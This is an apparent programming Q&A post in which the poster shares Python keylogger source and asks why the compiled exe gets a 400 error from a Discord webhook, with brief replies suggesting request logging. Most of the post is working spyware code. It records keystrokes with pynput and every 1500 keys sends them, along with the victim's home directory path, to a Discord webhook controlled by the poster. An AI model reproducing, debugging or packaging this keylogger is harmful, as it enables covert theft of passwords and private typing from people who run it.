# Getting "400 client error bad request for url" for my discord webhook on my python exe

Tags: python

This is a simple kinda bad keylogger that I have made and it works just fine whenever I run it as a python program on my computer but whenever I try to run it as an exe it reads the following : [image]

Heres the code :

```
from os import path
import pynput 
import dhooks
from dhooks import Webhook
from pynput.keyboard import Key, Listener 
from pathlib import Path
home = str(Path.home())

hook = Webhook("MY CURRENT WEBHOOK")
count = 0 
word = ""
keys = []
new_keys = []
# Key Pressed
def pressed(key):
    global keys, count, word
    if key == Key.space or key == Key.enter:
      word = " "
      keys += word 
      word = ""
    elif key == Key.shift_l or key == Key.alt_gr or key == Key.ctrl_l or key == Key.alt_l:
      return
    elif key == Key.backspace:
      keys = keys[:-1]
    
    else:  
      char = f'{key}' 
      word += char
      keys.append(char)
      count += 1
      print("{0} pressed".format(key))
      if count >= 1500: 
       count = 0
       SendDiscoText(keys)   
       word = ""
       keys = []


def SendDiscoText(keys):
 global new_keys
 for key in keys:
        new_key = str(key).replace("'","")
        new_keys.append(new_key)     
 newkei = str(new_keys).replace("'","")
 newkei = str(newkei).replace(",","")
 print(newkei)
 hook.send(home)
 hook.send(str(newkei))
 new_keys = []
 
        

# Key released
def released(key):
   if key == Key.esc:
     print("esc pressed! :D")

# key listener
with Listener(on_press=pressed, on_release=released) as listener:
    listener.join()
```

I would be very happy if anyone knows how to solve this issue or know what is causing it, please let me know!

Comment: Have you tried logging the request?

Comment: How would I do that?

Comment: See [Log all requests from the python-requests module](/q/16337511/4518341)